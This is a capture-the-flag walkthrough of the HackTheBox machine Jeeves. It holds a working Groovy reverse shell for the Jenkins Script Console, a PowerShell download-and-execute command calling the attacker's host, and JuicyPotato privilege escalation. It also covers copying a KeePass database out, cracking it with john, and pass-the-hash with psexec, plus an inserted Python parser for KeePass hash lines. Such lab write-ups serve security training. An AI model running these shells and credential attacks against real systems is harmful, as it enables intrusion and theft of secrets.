HTB - Jeeves


The given box, Jeeves, is a Windows machine with the IP address 10.10.10.63.

Recon

Nmap Scan Result

Performing an nmap scan on the target:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A 10.10.10.63
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 10:42 IST
Nmap scan report for 10.10.10.63
Host is up (0.28s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h06m22s, deviation: 0s, median: 5h06m21s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-20T10:19:24
|_  start_date: 2021-09-20T10:18:15

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   257.94 ms 10.10.14.1
2   259.94 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.84 seconds

Enumeration

Enumerating SMB

Using smbmap to enumerate the SMB service:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.63                  
[!] Authentication error on 10.10.10.63
                                                                                                                                                 
┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.63 -u moni
[!] Authentication error on 10.10.10.63

No clues here; unauthenticated access is rejected.

Enumerating Web Services

There are two web services open, one on port 80 and the other on port 50000:

80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves

Port 80/http is served by Microsoft-IIS/10.0.

Searching searchsploit for exploits against that version is a rabbit hole.

Submitting random input to the search form on the page returns an error page.

On closer inspection, that error page is just a static picture.

It does reveal some information about the Windows version, though.


50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found

The web service on port 50000 runs Jetty 9.4.z-SNAPSHOT.

Nothing is served at the root path (404).


Directory brute forcing both services would take a long time, so let's first pull any entries containing the keyword jeeves out of the wordlist and try only those:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep jeeves -n
41607:askjeeves
59026:jeeves
68198:askjeeveslogo
166405:jeevesinc

Let's try these paths on both services.

On port 80 they return a 404 error.

On port 50000 one of them returns a page that looks like a Jenkins portal.

Gaining Access

Since Jenkins is a software development and maintenance application, let's look for input fields where a reverse shell payload could be passed to gain a user shell.

After creating a project and submitting reverse shell scripts in several inputs, no luck.

The Jenkins documentation states that arbitrary code can be executed in the Script Console.

The Script Console page itself notes that scripts run with administrator-level privileges for the application.

A Groovy script is needed here to spawn a shell.

Reverse shell in Groovy script:

String host="10.10.14.3";
int port=9876;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump process output to the socket and socket input to the process until cmd.exe exits
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};
p.destroy();s.close();

Let's run this script to spawn a reverse shell back to our listener:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

...

C:\Users\kohsuke\Desktop>more user.txt
more user.txt
<---USER FLAG--->

Approach 1

Privilege Escalation

Let's try to escalate our privileges from user to NT AUTHORITY\SYSTEM. First, serve winPEAS from our machine:

┌──(aidenpearce369aidenpearce369)-[~//winPEAS/winPEASexe/binaries/Release]
└─$ ls
winPEASany.exe
                                                                                                                                                 
┌──(aidenpearce369aidenpearce369)-[~//winPEAS/winPEASexe/binaries/Release]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Downloading winPEAS onto the victim machine:

C:\Users\kohsuke\Desktop>powershell wget http://10.10.14.3:8000/winPEASany.exe -outfile privesc.exe
powershell wget http://10.10.14.3:8000/winPEASany.exe -outfile privesc.exe

C:\Users\kohsuke\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Desktop

09/20/2021  07:08 AM    <DIR>          .
09/20/2021  07:08 AM    <DIR>          ..
09/20/2021  07:09 AM         1,924,608 privesc.exe
11/03/2017  11:22 PM                32 user.txt
               2 File(s)      1,924,640 bytes
               2 Dir(s)   7,536,590,848 bytes free

After running privesc.exe (the renamed winPEAS binary), the relevant part of the output is:


...

Current Token privileges
 Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
    SeShutdownPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeUndockPrivilege: DISABLED
    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
    SeTimeZonePrivilege: DISABLED

...

So the user holds SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED.

A good article about Windows token impersonation: link.

Let's confirm the user's privileges in cmd:

C:\Users\kohsuke\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

More references on token impersonation:

Token Impersonation

Rotten Potato

Append the line below to the end of our PowerShell reverse shell script (rev.ps1), so the function is actually invoked when the script is loaded:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6767

Verifying it:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ cat rev.ps1| tail                                                                
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6767

Exploiting Admin

For this token impersonation we are going to use JuicyPotato.exe, because it is widely used for exploiting this kind of privilege abuse.

The reverse shell is downloaded and executed via a .bat file:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ cat attack.bat   
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:4545/rev.ps1')

Downloading JuicyPotato.exe and the batch file onto the victim:

C:\Users\kohsuke\Documents>powershell wget http://10.10.14.3:4545/JuicyPotato.exe -outfile jp.exe 
powershell wget http://10.10.14.3:4545/JuicyPotato.exe -outfile jp.exe

C:\Users\kohsuke\Documents>powershell wget http://10.10.14.3:4545/attack.bat -outfile attack.bat 
powershell wget http://10.10.14.3:4545/attack.bat -outfile attack.bat

C:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Documents

09/20/2021  08:40 AM    <DIR>          .
09/20/2021  08:40 AM    <DIR>          ..
09/20/2021  08:40 AM                93 attack.bat
09/18/2017  01:43 PM             2,846 CEH.kdbx
09/20/2021  08:40 AM           347,648 jp.exe
               3 File(s)        350,587 bytes
               2 Dir(s)   7,535,763,456 bytes free

JuicyPotato launches a program under the impersonated token. It needs three mandatory arguments: which CreateProcess call to use, the program to launch, and a port for its COM server to listen on:

C:\Users\kohsuke\Documents>.\jp.exe
.\jp.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

We can specify attack.bat as the program to launch with the impersonated token, which triggers the reverse shell from inside it.

Now running JuicyPotato:

C:\Users\kohsuke\Documents>.\jp.exe -t * -p attack.bat -l 7878
.\jp.exe -t * -p attack.bat -l 7878
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7878
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

It spawns a reverse shell with NT AUTHORITY\SYSTEM rights:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ nc -nlvp 6767
listening on [any] 6767 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.63] 49688
Windows PowerShell running as user JEEVES$ on JEEVES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd ../../
PS C:\> cd Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-ar---       12/24/2017   2:51 AM             36 hm.txt                        
-a----        11/8/2017   9:05 AM            797 Windows 10 Update             
                                                 Assistant.lnk                 


PS C:\Users\Administrator\Desktop> more hm.txt
The flag is elsewhere.  Look deeper.

PS C:\Users\Administrator\Desktop>

It seems the flag is hidden somewhere else.

"Look deeper"? On NTFS a file can carry alternate data streams besides its default :$DATA stream, and a normal directory listing does not show them, so let's list the streams on hm.txt.

Reference Blog

PS C:\Users\Administrator\Desktop> Get-Item -path .\hm.txt -stream *


   FileName: C:\Users\Administrator\Desktop\hm.txt

Stream                   Length
------                   ------
:$DATA                       36
root.txt                     34


PS C:\Users\Administrator\Desktop> Get-Item -path .\hm.txt -stream root.txt


   FileName: C:\Users\Administrator\Desktop\hm.txt

Stream                   Length
------                   ------
root.txt                     34


PS C:\Users\Administrator\Desktop> Get-Content -path .\hm.txt -stream root.txt
<---ADMIN FLAG--->

Approach 2

Privilege Escalation

Listing files in this directory,

C:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Documents

09/20/2021  08:40 AM    <DIR>          .
09/20/2021  08:40 AM    <DIR>          ..
09/20/2021  08:40 AM                93 attack.bat
09/18/2017  01:43 PM             2,846 CEH.kdbx
09/20/2021  08:40 AM           347,648 jp.exe
               3 File(s)        350,587 bytes
               2 Dir(s)   7,535,763,456 bytes free

There is an unusual file here named CEH.kdbx.

Let's transfer it from the victim to our machine via SMB.

On the local machine, start an SMB share:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ impacket-smbserver temp . 
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.63,49719)
[*] AUTHENTICATE_MESSAGE (\,JEEVES)
[*] User JEEVES\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:TEMP)
[*] AUTHENTICATE_MESSAGE (\,JEEVES)
[*] User JEEVES\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:TEMP)
[*] AUTHENTICATE_MESSAGE (\,JEEVES)
[*] User JEEVES\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:TEMP)

On the victim machine, map the share and copy the file:

PS C:\Users\kohsuke\Documents> dir


    Directory: C:\Users\kohsuke\Documents


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----        9/20/2021   8:40 AM             93 attack.bat                    
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx                      
-a----        9/20/2021   8:43 AM             93 dummy.bat                     
-a----        9/20/2021   8:40 AM         347648 jp.exe                        


PS C:\Users\kohsuke\Documents> New-PSDrive -Name "temp" -PSProvider "FileSystem" -Root "\\10.10.14.3\temp"

Name           Used (GB)     Free (GB) Provider      Root                      
----           ---------     --------- --------      ----                      
temp                                   FileSystem    \\10.10.14.3\temp         


PS C:\Users\kohsuke\Documents> cd temp:
PS temp:\> cp C:\Users\kohsuke\Documents\CEH.kdbx .
PS temp:\>

Now that the file is local, let's analyse it:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ file CEH.kdbx                
CEH.kdbx: Keepass password database 2.x KDBX

It is a KeePass database protected by a master password, which we need to crack.

Let's use keepass2john to extract a crackable hash from the database header:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ keepass2john CEH.kdbx > hash.txt
                                                                                                                                                 
┌──(aidenpearce369aidenpearce369)-[~]
└─$ cat hash.txt 
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
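Before cracking, it is worth reading what keepass2john actually extracted. As an added example (not from the writeup or from john), the Python below parses that line and audits the key stretching it reveals; the field layout it assumes for $keepass$*2* lines is rounds, algorithm, master seed, transform seed, IV, expected start bytes and the first 32 ciphertext bytes, with no key-file suffix, and the sample line is constructed with placeholder bytes around the page's 6000 rounds and AES. The rate estimate reuses the 844.6 c/s john reports further down and assumes AES-KDF cost is linear in the round count.

```python
# Assumed field layout of a keepass2john line for a KeePass 2.x database (no key-file suffix):
#   <label>:$keepass$*2*<rounds>*<algo>*<master_seed>*<transform_seed>*<iv>*<expected_start_bytes>*<first_ciphertext_block>
ALGORITHMS = {0: "AES", 1: "TwoFish", 2: "ChaCha"}      # the legend john prints as "Cost 3"
BLOB_NAMES = ("master_seed", "transform_seed", "iv", "expected_start_bytes", "first_ciphertext_block")
BLOB_HEX_LENGTHS = (64, 64, 32, 64, 64)                  # 32, 32, 16, 32, 32 bytes

# Constructed sample: placeholder bytes of the right sizes; rounds and algorithm
# mirror the Jeeves database (6000 rounds, AES).
SAMPLE_LINE = "CEH:$keepass$*2*6000*0*" + "*".join(
    ("%02x" % i) * (n // 2) for i, n in enumerate(BLOB_HEX_LENGTHS, start=1))


def parse_keepass2john(line: str) -> dict:
    """Split a keepass2john line into named fields, validating sizes and hex."""
    label, sep, rest = line.strip().partition(":")
    fields = rest.split("*")
    if sep != ":" or fields[:2] != ["$keepass$", "2"]:
        raise ValueError("only $keepass$*2* (KeePass 2.x) lines are handled")
    if len(fields) != 4 + len(BLOB_NAMES):
        raise ValueError("unexpected field count %d" % len(fields))
    parsed = {"label": label, "rounds": int(fields[2]),
              "algorithm": ALGORITHMS.get(int(fields[3]), "unknown")}
    for name, want, blob in zip(BLOB_NAMES, BLOB_HEX_LENGTHS, fields[4:]):
        if len(blob) != want:
            raise ValueError("%s: expected %d hex chars, got %d" % (name, want, len(blob)))
        parsed[name] = bytes.fromhex(blob)               # raises on non-hex characters
    return parsed


def estimated_rate(observed_rate: float, observed_rounds: int, new_rounds: int) -> float:
    """AES-KDF cost is linear in the round count, so the candidate rate scales inversely."""
    return observed_rate * observed_rounds / new_rounds


def kdf_audit(parsed: dict, min_rounds: int = 1_000_000) -> dict:
    """Flag weak key stretching; min_rounds is an illustrative policy value, not a KeePass default."""
    return {"rounds": parsed["rounds"], "algorithm": parsed["algorithm"],
            "weak": parsed["rounds"] < min_rounds}


if __name__ == "__main__":
    p = parse_keepass2john(SAMPLE_LINE)
    print(kdf_audit(p))
    # john on the page managed about 844.6 candidates/s against 6000 rounds
    print("at 600000 rounds: ~%.1f c/s" % estimated_rate(844.6, p["rounds"], 600_000))
```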

Cracking the hash with john:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ john --list=formats | grep key
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256, 
BKS, Blackberry-ES10, WoWSRP, Blockchain, chap, Clipperz, cloudkeychain, 
itunes-backup, iwork, KeePass, keychain, keyring, keystore, known_hosts, 
skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP, solarwinds, SSH, sspr, 

┌──(aidenpearce369aidenpearce369)-[~]
└─$ john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:01:05 DONE (2021-09-20 14:19) 0.01536g/s 844.6p/s 844.6c/s 844.6C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

┌──(aidenpearce369aidenpearce369)-[~]
└─$ john hash.txt --show 
CEH:moonshine1

1 password hash cracked, 0 left

Now let's use kpcli to view the contents:

┌──(aidenpearce369aidenpearce369)-[~]
└─$ kpcli  -kdb CEH.kdbx      
Please provide the master password: *************************

KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
CEH/
kpcli:/> cd CEH/
kpcli:/CEH> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com
kpcli:/CEH> cd General/
kpcli:/CEH/General> ls
kpcli:/CEH/General> ls -la
kpcli:/CEH/General> cd ..
kpcli:/CEH> cd eMail/
kpcli:/CEH/eMail> ls
kpcli:/CEH/eMail> cd ..
kpcli:/CEH> cd Windows/
kpcli:/CEH/Windows> ls
kpcli:/CEH/Windows> cd ..
kpcli:/CEH> cd Internet/
kpcli:/CEH/Internet> ls
kpcli:/CEH/Internet> ls -la
kpcli:/CEH/Internet> cd ..
kpcli:/CEH> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com
kpcli:/CEH> show -f 0

Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

kpcli:/CEH> show -f 5

Title: Jenkins admin
Uname: admin
 Pass: 
  URL: http://localhost:8080
Notes: We don't even need creds! Unhackable! 

kpcli:/CEH> show -f 6

Title: Keys to the kingdom
Uname: bob
 Pass: lCEUnYPjNfIuPZSzOySA
  URL: 
Notes: 

kpcli:/CEH> show -f 4

Title: It's a secret
Uname: admin
 Pass: F7WhTrSFDKB6sxHU1cUn
  URL: http://localhost:8180/secret.jsp
Notes: 

kpcli:/CEH> show -f 3

Title: EC-Council
Uname: hackerman123
 Pass: pwndyouall!
  URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
Notes: Personal login

kpcli:/CEH> show -f 2

Title: DC Recovery PW
Uname: administrator
 Pass: S1TjAtJHKsugh9oC4VZl
  URL: 
Notes: 

kpcli:/CEH> show -f 1

Title: Bank of America
Uname: Michael321
 Pass: 12345
  URL: https://www.bankofamerica.com
Notes: 

kpcli:/CEH> show -f 7

Title: Walmart.com
Uname: anonymous
 Pass: Password
  URL: http://www.walmart.com
Notes: Getting my shopping on

kpcli:/CEH> 

Exploiting Admin

Checking for other users on the victim machine:

C:\Users\kohsuke\Documents>net user
net user

User accounts for \\JEEVES

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
kohsuke                  
The command completed successfully.

After trial and error with the credentials above, one entry stands out:

Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes:

This one seems suspicious:

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

It looks like an NTLM hash in LM:NT form.

Let's use Impacket's psexec.py to get a shell as Administrator over SMB using the NTLM hash (pass the hash):

For more on psexec.py

┌──(aidenpearce369aidenpearce369)-[~]
└─$ psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" Administrator@10.10.10.63 
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file nPBVBbGz.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service eHiw on 10.10.10.63.....
[*] Starting service eHiw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

...
 
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,491,067,904 bytes free

C:\Users\Administrator\Desktop>dir /R
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,491,067,904 bytes free

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
<---ROOT FLAG--->